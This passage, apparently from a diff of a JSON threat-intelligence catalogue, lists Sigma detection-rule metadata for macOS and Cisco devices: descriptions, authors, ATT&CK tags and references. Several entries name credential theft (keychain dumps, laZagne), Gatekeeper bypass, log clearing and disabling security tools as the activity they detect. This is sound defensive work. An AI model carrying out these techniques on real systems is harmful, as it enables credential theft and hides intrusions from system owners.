"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_base64_decode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "719c22d7-c11a-4f2c-93a6-2cfdd5412f68", - "value": "Decode Base64 Encoded Text -MacOs" - }, - { - "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.", - "meta": { - "author": "Igor Fits, Mikhail Larin, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate script work" - ], - "filename": "proc_creation_macos_binary_padding.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_binary_padding.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.001" - ] - }, - "uuid": "95361ce5-c891-4b0a-87ca-e24607884a96", - "value": "Binary Padding - MacOS" - }, - { - "description": "Detect file time attribute change to hide new or changes to existing files", - "meta": { - "author": "Igor Fits, Mikhail Larin, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_macos_change_file_time_attr.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml" - ], - 
"tags": [ - "attack.defense_evasion", - "attack.t1070.006" - ] - }, - "uuid": "88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0", - "value": "File Time Attribute Change" - }, - { - "description": "Detects deletion of local audit logs", - "meta": { - "author": "remotephone, oscd.community", - "creation_date": "2020/10/11", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_clear_system_logs.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.002" - ] - }, - "uuid": "acf61bd8-d814-4272-81f0-a7a269aa69aa", - "value": "Indicator Removal on Host - Clear Mac System Logs" - }, - { - "description": "Detects the creation of a new user account. 
Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/06", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_create_account.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" - ], - "tags": [ - "attack.t1136.001", - "attack.persistence" - ] - }, - "uuid": "51719bf5-e4fd-4e44-8ba8-b830e7ac0731", - "value": "Creation Of A Local User Account" - }, - { - "description": "Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/10/10", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_create_hidden_account.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.002" - ] - }, - "uuid": "b22a5b36-2431-493a-8be1-0bae56c28ef3", - "value": "Hidden User Creation" - }, - { - "description": "Detects passwords dumps from Keychain", - "meta": { - "author": "Tim Ismilyaev, oscd.community, Florian Roth", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": 
"proc_creation_macos_creds_from_keychain.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md", - "https://gist.github.com/Capybara/6228955", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.001" - ] - }, - "uuid": "b120b587-a4c2-4b94-875d-99c9807d6955", - "value": "Credentials from Password Stores - Keychain" - }, - { - "description": "Detects disabling security tools", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate activities" - ], - "filename": "proc_creation_macos_disable_security_tools.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "ff39f1a6-84ac-476f-a1af-37fcdf53d7c0", - "value": "Disable Security Tools" - }, - { - "description": "Detects usage of system utilities to discover files and directories", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate activities" - ], - "filename": "proc_creation_macos_file_and_directory_discovery.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ] - }, - "uuid": "089dbdf6-b960-4bcc-90e3-ffc3480c20f6", - "value": "File and Directory Discovery - MacOS" - }, - { - "description": "Detecting attempts to extract passwords with grep and laZagne", - "meta": { - "author": "Igor Fits, Mikhail Larin, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_macos_find_cred_in_files.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001" - ] - }, - "uuid": "53b1b378-9b06-4992-b972-dde6e423d2b4", - "value": "Credentials In Files" - }, - { - "description": "Detects attempts to use system dialog prompts to capture user credentials", - "meta": { - "author": "remotephone, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Legitimate administration tools and activities" - ], - "filename": "proc_creation_macos_gui_input_capture.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md", - "https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1056.002" - ] - }, - "uuid": "60f1ce20-484e-41bd-85f4-ac4afec2c541", - "value": 
"GUI Input Capture - macOS" - }, - { - "description": "Detects enumeration of local systeam accounts on MacOS", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/08", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_local_account.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_account.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.001" - ] - }, - "uuid": "ddf36b67-e872-4507-ab2e-46bda21b842c", - "value": "Local System Accounts Discovery - MacOs" - }, - { - "description": "Detects enumeration of local system groups", - "meta": { - "author": "Ömer Günal, Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/11", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_local_groups.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_groups.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ] - }, - "uuid": "89bb1f97-c7b9-40e8-b52b-7d6afbd67276", - "value": "Local Groups Discovery - MacOs" - }, - { - "description": "Detects enumeration of local or remote network services.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/21", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_network_service_scanning.yml", - "level": 
"low", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ] - }, - "uuid": "84bae5d4-b518-4ae0-b331-6d4afd34d00f", - "value": "MacOS Network Service Scanning" - }, - { - "description": "Detects the usage of tooling to sniff network traffic.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/14", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_network_sniffing.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_sniffing.yml" - ], - "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" - ] - }, - "uuid": "adc9bcc4-c39c-4f6b-a711-1884017bf043", - "value": "Network Sniffing - MacOs" - }, - { - "description": "Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. 
This behavior is consistent with adware or malware families such as Bundlore and Shlayer.", - "meta": { - "author": "Tim Rauch (rule), Elastic (idea)", - "creation_date": "2022/10/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_macos_payload_decoded_and_decrypted.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml" - ], - "tags": [ - "attack.t1059", - "attack.t1204", - "attack.execution", - "attack.t1140", - "attack.defense_evasion", - "attack.s0482", - "attack.s0402" - ] - }, - "uuid": "234dc5df-40b5-49d1-bf53-0d44ce778eca", - "value": "Payload Decoded and Decrypted via Built-in Utilities" - }, - { - "description": "Detects the enumeration of other remote systems.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/22", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_remote_system_discovery.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018" - ] - }, - "uuid": "10227522-8429-47e6-a301-f2b2d014e7ad", - "value": "Macos Remote System Discovery" - }, - { - "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. 
Detection will focus on crontab jobs uploaded from the tmp folder.", - "meta": { - "author": "Alejandro Ortuno, oscd.community", - "creation_date": "2020/10/06", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_schedule_task_job_cron.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1053.003" - ] - }, - "uuid": "7c3b43d8-d794-47d2-800a-d277715aa460", - "value": "Scheduled Cron Task/Job - MacOs" - }, - { - "description": "Detects attempts to use screencapture to collect macOS screenshots", - "meta": { - "author": "remotephone, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Legitimate user activity taking screenshots" - ], - "filename": "proc_creation_macos_screencapture.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ] - }, - "uuid": "0877ed01-da46-4c49-8476-d49cdd80dfa7", - "value": "Screen Capture - macOS" - }, - { - "description": "Detects usage of system utilities (only grep for now) to discover security software discovery", - "meta": { - "author": "Daniil Yugoslavskiy, 
oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate activities" - ], - "filename": "proc_creation_macos_security_software_discovery.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518.001" - ] - }, - "uuid": "0ed75b9c-c73b-424d-9e7d-496cd565fbe0", - "value": "Security Software Discovery - MacOs" - }, - { - "description": "Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.", - "meta": { - "author": "remotephone", - "creation_date": "2021/11/20", - "falsepositive": [ - "Mistyped commands or legitimate binaries named to match the pattern" - ], - "filename": "proc_creation_macos_space_after_filename.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_space_after_filename.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.006" - ] - }, - "uuid": "b6e2a2e3-2d30-43b1-a4ea-071e36595690", - "value": "Space After Filename - macOS" - }, - { - "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", - "meta": { - "author": "Igor Fits, Mikhail Larin, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "proc_creation_macos_split_file_into_pieces.yml", - "level": "low", - "logsource.category": "process_creation", 
- "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1030" - ] - }, - "uuid": "7f2bb9d5-6395-4de5-969c-70c11fbe6b12", - "value": "Split A File Into Pieces" - }, - { - "description": "Detects when the macOS Script Editor utility spawns an unusual child process.", - "meta": { - "author": "Tim Rauch (rule), Elastic (idea)", - "creation_date": "2022/10/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_macos_susp_execution_macos_script_editor.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685", - "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml" - ], - "tags": [ - "attack.t1566", - "attack.t1566.002", - "attack.initial_access", - "attack.t1059", - "attack.t1059.002", - "attack.t1204", - "attack.t1204.001", - "attack.execution", - "attack.persistence", - "attack.t1553", - "attack.defense_evasion" - ] - }, - "uuid": "6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4", - "value": "Suspicious Execution via macOS Script Editor" - }, - { - "description": "Detects commandline operations on shell history files", - "meta": { - "author": "Mikhail Larin, oscd.community", - "creation_date": "2020/10/17", - "falsepositive": [ - "Legitimate administrative activity", - "Legitimate software, cleaning hist file" - ], - "filename": "proc_creation_macos_susp_histfile_operations.yml", - 
"level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.003" - ] - }, - "uuid": "508a9374-ad52-4789-b568-fc358def2c65", - "value": "Suspicious History File Operations" - }, - { - "description": "Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/30", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_susp_macos_firmware_activity.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml", - "https://www.manpagez.com/man/8/firmwarepasswd/", - "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "7ed2c9f7-c59d-4c82-a7e2-f859aa676099", - "value": "Suspicious MacOS Firmware Activity" - }, - { - "description": "Detects usage of system utilities to discover system network connections", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate activities" - ], - "filename": "proc_creation_macos_system_network_connections_discovery.yml", - "level": "informational", - "logsource.category": "process_creation", - 
"logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049" - ] - }, - "uuid": "9a7a0393-2144-4626-9bf1-7c2f5a7321db", - "value": "System Network Connections Discovery - MacOs" - }, - { - "description": "Detects enumeration of local network configuration", - "meta": { - "author": "remotephone, oscd.community", - "creation_date": "2020/10/06", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_macos_system_network_discovery.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1016" - ] - }, - "uuid": "58800443-f9fc-4d55-ae0c-98a3966dfb97", - "value": "System Network Discovery - macOS" - }, - { - "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", - "meta": { - "author": "Igor Fits, Mikhail Larin, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "proc_creation_macos_system_shutdown_reboot.yml", - "level": "informational", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml" - ], - "tags": [ - "attack.impact", - "attack.t1529" - ] - }, - "uuid": "40b1fbe2-18ea-4ee7-be47-0294285811de", - "value": "System Shutdown/Reboot - MacOs" - }, - { - "description": "Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.", - "meta": { - "author": "Tim Rauch (rule), Elastic (idea)", - "creation_date": "2022/10/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_macos_wizardupdate_malware_infection.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97", - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", - "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml" - ], - "tags": [ - "attack.command_and_control" - ] - }, - "uuid": "f68c4a4f-19ef-4817-952c-50dce331f4b0", - "value": "Potential WizardUpdate Malware Infection" - }, - { - "description": "Detects macOS Gatekeeper bypass via xattr utility", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2020/10/19", - "falsepositive": [ - "Legitimate activities" - ], - "filename": "proc_creation_macos_xattr_gatekeeper_bypass.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.001/T1553.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.001" - ] - }, - "uuid": "f5141b6d-9f42-41c6-a7bf-2a780678b29b", - "value": "Gatekeeper Bypass via Xattr" - }, - { - "description": "Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.", - "meta": { - "author": "Tim Rauch (rule), Elastic (idea)", - "creation_date": "2022/10/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_macos_xcsset_malware_infection.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "macos", - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08", - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml" - ], - "tags": [ - "attack.command_and_control" - ] - }, - "uuid": "47d65ac0-c06f-4ba2-a2e3-d263139d0f51", - "value": "Potential XCSSET Malware Infection" - }, - { - "description": "Clear command history in network OS which is used for defense evasion", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/12", - "falsepositive": [ - "Legitimate administrators may run these commands" - ], - "filename": "cisco_cli_clear_logs.yml", - "level": "high", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_clear_logs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ] - }, - "uuid": "ceb407f6-8277-439b-951f-e4210e3ed956", - "value": "Cisco Clear Logs" - }, - { - "description": "Collect pertinent data from the configuration files", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/11", - "falsepositive": [ - "Commonly run by administrators" - ], - "filename": "cisco_cli_collect_data.yml", - "level": "low", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_collect_data.yml" - ], - "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.collection", - "attack.t1087.001", - "attack.t1552.001", - "attack.t1005" - ] - }, - "uuid": "cd072b25-a418-4f98-8ebc-5093fb38fe1a", - "value": "Cisco Collect Data" - }, - { - "description": "Show when private keys are being exported from the device, or when new certificates are installed", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/12", - "falsepositive": [ - "Not commonly run by administrators. 
Also whitelist your known good certificates" - ], - "filename": "cisco_cli_crypto_actions.yml", - "level": "high", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml" - ], - "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1553.004", - "attack.t1552.004" - ] - }, - "uuid": "1f978c6a-4415-47fb-aca5-736a44d7ca3d", - "value": "Cisco Crypto Commands" - }, - { - "description": "Turn off logging locally or remote", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/11", - "falsepositive": [ - "Unknown" - ], - "filename": "cisco_cli_disable_logging.yml", - "level": "high", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_disable_logging.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "9e8f6035-88bf-4a63-96b6-b17c0508257e", - "value": "Cisco Disabling Logging" - }, - { - "description": "Find information about network devices that is not stored in config files", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/12", - "falsepositive": [ - "Commonly used by administrators for troubleshooting" - ], - "filename": "cisco_cli_discovery.yml", - "level": "low", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083", - "attack.t1201", - "attack.t1057", - "attack.t1018", - "attack.t1082", - "attack.t1016", - "attack.t1049", - "attack.t1033", - "attack.t1124" - ] - }, - "uuid": "9705a6a1-6db6-4a16-a987-15b7151e299b", - "value": "Cisco Discovery" - }, - { - "description": "Detect a system being shutdown or put into different boot mode", - "meta": { - "author": 
"Austin Clark", - "creation_date": "2019/08/15", - "falsepositive": [ - "Legitimate administrators may run these commands, though rarely." - ], - "filename": "cisco_cli_dos.yml", - "level": "medium", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_dos.yml" - ], - "tags": [ - "attack.impact", - "attack.t1495", - "attack.t1529", - "attack.t1565.001" - ] - }, - "uuid": "d94a35f0-7a29-45f6-90a0-80df6159967c", - "value": "Cisco Denial of Service" - }, - { - "description": "See what files are being deleted from flash file systems", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/12", - "falsepositive": [ - "Will be used sometimes by admins to clean up local flash space" - ], - "filename": "cisco_cli_file_deletion.yml", - "level": "medium", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_file_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1070.004", - "attack.t1561.001", - 